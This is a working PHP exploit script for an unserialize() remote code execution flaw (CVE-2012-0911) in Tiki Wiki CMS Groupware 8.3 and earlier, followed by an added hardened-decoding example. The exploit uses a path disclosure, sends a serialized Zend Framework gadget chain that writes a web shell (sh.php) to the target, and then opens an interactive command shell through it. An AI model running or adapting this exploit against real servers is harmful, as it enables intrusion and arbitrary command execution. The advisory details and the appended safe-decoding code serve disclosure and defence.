<?php

/*
    -----------------------------------------------------------------
    Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution
    -----------------------------------------------------------------

    author...........: Egidio Romano aka EgiX
    mail.............: n0b0d13s[at]gmail[dot]com
    software link....: http://info.tiki.org/

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will not be responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerable code in different locations:

    lib/banners/bannerlib.php:28:     $views = unserialize($_COOKIE[$cookieName]);
    lib/banners/bannerlib.php:136:    $views = unserialize($_COOKIE[$cookieName]);
    tiki-print_multi_pages.php:19:    $printpages = unserialize(urldecode($_REQUEST['printpages']));
    tiki-print_multi_pages.php:24:    $printstructures = unserialize(urldecode($_REQUEST['printstructures']));
    tiki-print_pages.php:31:          $printpages = unserialize(urldecode($_REQUEST["printpages"]));
    tiki-print_pages.php:32:          $printstructures = unserialize(urldecode($_REQUEST['printstructures']));
    tiki-send_objects.php:42:         $sendpages = unserialize(urldecode($_REQUEST['sendpages']));
    tiki-send_objects.php:48:         $sendstructures = unserialize(urldecode($_REQUEST['sendstructures']));
    tiki-send_objects.php:54:         $sendarticles = unserialize(urldecode($_REQUEST['sendarticles']));

    The vulnerability is caused by all these scripts calling "unserialize()" on user-controlled input.
    This can lead to execution of arbitrary PHP code by passing an ad-hoc serialized Zend Framework object.

    [-] Full path disclosure at:

    http://[host]/[path]/admin/include_calendar.php
    http://[host]/[path]/tiki-rss_error.php
    http://[host]/[path]/tiki-watershed_service.php

    [-] Disclosure timeline:

    [11/01/2012] - Vulnerability discovered
    [14/01/2012] - Issue reported to security(at)tikiwiki.org
    [14/01/2012] - New ticket opened: http://dev.tiki.org/item4109
    [23/01/2012] - CVE number requested
    [23/01/2012] - Assigned CVE-2012-0911
    [01/05/2012] - Version 8.4 released: http://info.tiki.org/article191-Tiki-Releases-8-4
    [04/07/2012] - Public disclosure
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// Minimal raw HTTP client: sends one request and returns the whole response.
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

// Recovers the installation path from the full path disclosure in tiki-rss_error.php.
function get_path()
{
    global $host, $path;

    $packet  = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";

    if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n");
    return $m[1];
}

print "\n+----------------------------------------------------------------------+";
print "\n| Tiki Wiki CMS Groupware <= 8.3 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /tiki/\n";
    die();
}

list($host, $path) = array($argv[1], $argv[2]);

$f_path = get_path();
print "\n[-] Path disclosure: {$f_path}\n";

// Local stand-ins for the Zend Framework classes that are autoloadable on the target;
// only the properties needed for serialization are declared.
class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '<?php error_reporting(0); print(___); passthru(base64_decode($_SERVER[HTTP_CMD])); die; ?>';
}

class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;

    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}

interface Zend_Pdf_ElementFactory_Interface {}

class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
    protected $_docCount = 1;
    protected $_name = 'foo';
    protected $_directory;
    protected $_fields;
    protected $_files;

    public function __construct($directory, $fields)
    {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}

class Zend_Pdf_ElementFactory_Proxy
{
    private $_factory;

    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
    {
        $this->_factory = $factory;
    }
}

// http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem($f_path."sh.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);

$payload = urlencode(serialize($____proxy));
$payload = str_replace('%00', '%2500', $payload);
$payload = "printpages={$payload}";

$packet  = "POST {$path}tiki-print_multi_pages.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

if (preg_match('/multiprint/', http_send($host, $packet))) die("[-] Multi-print feature disabled!\n");

$packet  = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\ntiki-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
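As an added example (not part of EgiX's exploit or of Tiki's own code), the sink from tiki-print_multi_pages.php listed in the advisory is shown beside a hardened replacement that never lets unserialize() build objects and validates the shape of what the feature actually needs; the function names and sample inputs are constructed for this illustration.

```php
<?php
// Added example, not Tiki's code. Function names are assumptions for this illustration.

// Vulnerable pattern (tiki-print_multi_pages.php:19 in the advisory): every object in
// the request is instantiated, so any autoloadable class with a magic-method gadget runs.
function vulnerable_decode($raw)
{
    return unserialize(urldecode($raw));
}

// Hardened: the feature only needs a flat list of page names, so reject object tokens
// up front, forbid object instantiation in unserialize() (allowed_classes => false,
// PHP >= 7.0) and validate the resulting shape. Returns null on anything unexpected.
function safe_decode_page_list($raw, $maxItems = 100)
{
    $data = urldecode($raw);
    // Any serialized object ("O:") or custom-serialized object ("C:") token means the
    // input is not a plain list of strings. This also guards PHP 5, which has no
    // allowed_classes option (a page name containing ';O:1:"' is a tolerated false positive).
    if (preg_match('/(^|[;{])[OC]:\d+:"/', $data)) {
        return null;
    }
    $value = PHP_VERSION_ID >= 70000
        ? @unserialize($data, array('allowed_classes' => false))
        : @unserialize($data);
    if (!is_array($value) || count($value) > $maxItems) {
        return null;
    }
    $pages = array();
    foreach ($value as $item) {
        // Page names are short printable strings; anything else is rejected.
        if (!is_string($item) || $item === '' || strlen($item) > 255
            || preg_match('/[\x00-\x1f\x7f]/', $item)) {
            return null;
        }
        $pages[] = $item;
    }
    return $pages;
}

// Constructed sample inputs: a legitimate two-page list and an object payload.
$good = urlencode(serialize(array('HomePage', 'Sandbox')));
$bad  = urlencode('O:8:"stdClass":1:{s:4:"name";s:3:"foo";}');

print "good input -> ";
var_dump(safe_decode_page_list($good));
print "object payload -> ";
var_dump(safe_decode_page_list($bad));
```

For new code the cleaner fix is to carry such lists as JSON (json_encode()/json_decode()) so no object graph can ever be described by the client; the version above keeps the existing serialized format for a drop-in replacement of the vulnerable lines.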